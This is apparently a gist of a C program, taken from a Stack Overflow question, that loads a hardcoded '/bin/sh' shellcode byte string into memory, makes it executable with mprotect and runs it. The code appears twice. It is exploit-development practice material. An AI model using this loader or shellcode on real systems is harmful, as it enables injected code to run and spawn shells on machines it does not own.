shantoroy/bin-sh-using-mprotect.c

## bin-sh-using-mprotect.c
// source: https://stackoverflow.com/questions/43849847/executing-shellcode-in-shared-memory-with-mmap

#include <string.h>
#include <sys/mman.h>

// /bin/sh shellcode
const char shellcode[] = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x52\x40\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x2d\x1c\x2f\x62\x69\x6e\x2f\x73\x68\x58";

int main(int argc, char **argv)
{
    void *mem = mmap(0, sizeof(shellcode), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, -1, 0);

    memcpy(mem, shellcode, sizeof(shellcode));

    mprotect(mem, sizeof(shellcode), PROT_READ|PROT_WRITE|PROT_EXEC);

    int (*func)();
    func = (int (*)())mem;
    (int)(*func)();

    munmap(mem, sizeof(shellcode));

    return 0;
}
	// source: https://stackoverflow.com/questions/43849847/executing-shellcode-in-shared-memory-with-mmap

	#include <string.h>
	#include <sys/mman.h>

	// /bin/sh shellcode
	const char shellcode[] = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x52\x40\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x2d\x1c\x2f\x62\x69\x6e\x2f\x73\x68\x58";

	int main(int argc, char **argv)
	{
	void *mem = mmap(0, sizeof(shellcode), PROT_READ\|PROT_WRITE, MAP_SHARED\|MAP_ANONYMOUS, -1, 0);

	memcpy(mem, shellcode, sizeof(shellcode));

	mprotect(mem, sizeof(shellcode), PROT_READ\|PROT_WRITE\|PROT_EXEC);

	int (*func)();
	func = (int (*)())mem;
	(int)(*func)();

	munmap(mem, sizeof(shellcode));

	return 0;
	}